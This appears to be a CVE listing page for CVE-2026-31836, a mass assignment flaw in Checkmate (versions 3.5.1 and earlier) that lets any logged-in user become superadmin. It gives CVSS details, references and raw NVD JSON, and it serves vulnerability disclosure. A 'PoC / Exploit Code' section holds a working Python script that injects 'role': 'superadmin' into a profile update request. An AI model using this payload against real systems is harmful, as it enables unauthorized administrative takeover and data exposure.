CVE-2026-31836

Description

Checkmate is an open-source, self-hosted tool designed to track and monitor server hardware, uptime, response times, and incidents in real-time with beautiful visualizations. In versions from 3.5.1 and prior, a mass assignment vulnerability in Checkmate's user profile update endpoint allows any authenticated user to escalate their privileges to superadmin, bypassing all role-based access controls. An attacker can modify their user role to gain complete administrative access to the application, including the ability to view all users, modify critical configurations, and access sensitive system data. At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:bluewavelabs:checkmate:*:*:*:*:*:*:*:* - VULNERABLE

Checkmate <= 3.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target API endpoint for updating user profile target_url = "https://target-checkmate.com/api/v1/user/profile" # Attacker's session cookie (obtained after low-privilege login) attacker_cookies = { "session_id": "low_priv_user_session_token" } # Headers headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Malicious payload exploiting Mass Assignment # Adding 'role' parameter which should not be modifiable by users payload = { "username": "attacker", "email": "[email protected]", "role": "superadmin", # Vulnerability: Injecting admin role "is_admin": True # Alternative parameter injection } # Send the malicious request response = requests.patch(target_url, json=payload, headers=headers, cookies=attacker_cookies) if response.status_code == 200: print("[+] Privilege escalation successful! User is now superadmin.") else: print(f"[-] Failed. Status code: {response.status_code}") print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31836
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31836
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31836/
[4] VulDB https://vuldb.com/cve/CVE-2026-31836
[5] https://github.com/bluewave-labs/Checkmate/security/advisories/GHSA-6368-x7wr-wpm2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31836", "sourceIdentifier": "[email protected]", "published": "2026-03-20T18:16:13.540", "lastModified": "2026-03-30T14:35:01.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Checkmate is an open-source, self-hosted tool designed to track and monitor server hardware, uptime, response times, and incidents in real-time with beautiful visualizations. In versions from 3.5.1 and prior, a mass assignment vulnerability in Checkmate's user profile update endpoint allows any authenticated user to escalate their privileges to superadmin, bypassing all role-based access controls. An attacker can modify their user role to gain complete administrative access to the application, including the ability to view all users, modify critical configurations, and access sensitive system data. At time of publication, there are no publicly available patches."}, {"lang": "es", "value": "Checkmate es una herramienta de código abierto y autoalojada diseñada para rastrear y monitorear el hardware del servidor, el tiempo de actividad, los tiempos de respuesta y los incidentes en tiempo real con hermosas visualizaciones. En versiones desde la 3.5.1 y anteriores, una vulnerabilidad de asignación masiva en el endpoint de actualización del perfil de usuario de Checkmate permite a cualquier usuario autenticado escalar sus privilegios a superadministrador, eludiendo todos los controles de acceso basados en roles. Un atacante puede modificar su rol de usuario para obtener acceso administrativo completo a la aplicación, incluyendo la capacidad de ver a todos los usuarios, modificar configuraciones críticas y acceder a datos sensibles del sistema. En el momento de la publicación, no hay parches disponibles públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bluewavelabs:checkmate:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.5.1", "matchCriteriaId": "D7F58CAA-914A-4C3B-8E92-E137225D9620"}]}]}], "references": [{"url": "https://github.com/bluewave-labs/Checkmate/security/advisories/GHSA-6368-x7wr-wpm2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}